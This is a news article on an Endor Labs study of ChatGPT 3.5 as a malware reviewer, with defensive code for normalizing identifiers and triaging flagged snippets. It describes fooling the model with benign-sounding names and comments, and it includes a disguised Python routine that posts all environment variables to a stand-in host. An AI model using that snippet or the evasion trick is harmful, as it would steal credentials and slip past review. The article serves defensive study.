ChatGPT-3.5: AI-assisted malware detection still has room for improvement, according to Endor Labs study


A recent test of the ChatGPT 3.5 artificial intelligence language model has shown that while it can assist in identifying possible malware, it is not yet ready to replace human review. Researchers at Endor Labs tested ChatGPT 3.5 against nearly 2,000 artifacts from open-source code repositories; it flagged 34 of them as containing malware, but only 13 actually contained malicious code. Five others contained obfuscated code that did not exhibit any malicious behavior, and one was a proof-of-concept that downloaded and opened an image through an npm install hook.

The remaining 15 of the 34 artifacts flagged by ChatGPT 3.5 were false positives. The researchers also found that the model can be fooled into classifying malicious code as benign through simple evasion techniques: giving functions innocent-sounding names, adding comments that suggest benign functionality, or including harmless-looking string literals. Henrik Plate, a researcher at Endor Labs, noted in a blog post that LLM-assisted malware reviews "can complement, but not yet substitute human reviews."
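To illustrate the kind of deception the researchers describe, consider a hypothetical snippet (not taken from the study) in which an exfiltration routine is dressed up with a benign-sounding name, docstring, and comments. A reviewer, human or LLM, who trusts those identifiers could easily wave it through.

```python
import base64
import os
import urllib.request


def refresh_license_cache():
    """Synchronize the local license cache with the vendor portal."""
    # The friendly name and docstring above are the camouflage: what the code
    # actually does is harvest every environment variable (which often holds
    # tokens and credentials) and post it to a remote host.
    # "example.invalid" stands in for an attacker-controlled server.
    settings = base64.b64encode(repr(dict(os.environ)).encode())
    urllib.request.urlopen("https://example.invalid/license/refresh", data=settings)
```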

While ChatGPT 4 has since been released and produces different results, the researchers say that pre-processing of code snippets, further prompt engineering, and future models are expected to improve the outcome. Microsoft is already using large language models to assess possible malware through its Security Copilot application.
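One way such pre-processing could work is to strip exactly the channels an adversary can abuse: comments disappear when code is re-emitted from its syntax tree, and locally defined names can be replaced with neutral placeholders before the snippet is shown to the model. The sketch below is an assumption about what that step might look like for Python sources (it needs Python 3.9+ for ast.unparse) and is not Endor Labs' actual pipeline.

```python
import ast


class IdentifierNormalizer(ast.NodeTransformer):
    """Rename function and parameter names to neutral placeholders so an LLM
    cannot be swayed by benign-sounding identifiers."""

    def __init__(self):
        self.aliases = {}

    def _alias(self, name: str) -> str:
        return self.aliases.setdefault(name, f"id_{len(self.aliases)}")

    def visit_FunctionDef(self, node: ast.FunctionDef) -> ast.FunctionDef:
        node.name = self._alias(node.name)
        for arg in node.args.args:
            arg.arg = self._alias(arg.arg)
        self.generic_visit(node)  # rename uses of the parameters in the body
        return node

    def visit_Name(self, node: ast.Name) -> ast.Name:
        # Only rewrite names we have already aliased, leaving builtins intact.
        if node.id in self.aliases:
            node.id = self.aliases[node.id]
        return node


def normalize(source: str) -> str:
    tree = IdentifierNormalizer().visit(ast.parse(source))
    # ast.unparse drops comments entirely, removing another channel for deception.
    return ast.unparse(tree)
```

Running normalize over a flagged file yields identifier- and comment-free source that can then be embedded in the prompt.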

Plate emphasized an inherent problem with relying on identifiers and comments to understand code behavior: they are a valuable source of information when written by benign developers, but they can also be abused by adversaries to evade detection of malicious behavior. While LLM-based assessments should not replace manual reviews, they can serve as an additional signal and input to manual reviews, particularly for automatically triaging the larger numbers of malware signals produced by noisy detectors.
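As a sketch of how that "additional signal" might be wired in, the snippet below assumes a hypothetical ask_llm helper; the helper's name, the prompt format, and the 0-to-9 rating scale are all assumptions rather than the study's setup. Snippets flagged by a noisy detector are rated by the model, and only those rated at or above a threshold are queued for human review.

```python
# Hypothetical helper: send a prompt to whatever LLM endpoint is available and
# return its text reply. The name and signature are assumptions, not a real API.
def ask_llm(prompt: str) -> str:
    raise NotImplementedError("wire this to your LLM provider of choice")


RISK_PROMPT = (
    "You are reviewing a code snippet flagged by an automated malware detector.\n"
    "Rate the likelihood that it is malicious from 0 (benign) to 9 (clearly\n"
    "malicious) and briefly justify the rating.\n\nSnippet:\n{snippet}"
)


def triage(flagged_snippets: list[str], threshold: int = 5) -> list[tuple[str, str]]:
    """Use the LLM verdict as one extra signal: only snippets rated at or above
    the threshold are queued for human review."""
    queue = []
    for snippet in flagged_snippets:
        reply = ask_llm(RISK_PROMPT.format(snippet=snippet))
        # Crude parse: take the first digit in the reply as the rating.
        digits = [int(ch) for ch in reply if ch.isdigit()]
        score = digits[0] if digits else threshold  # no rating: fail open to review
        if score >= threshold:
            queue.append((snippet, reply))
    return queue
```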
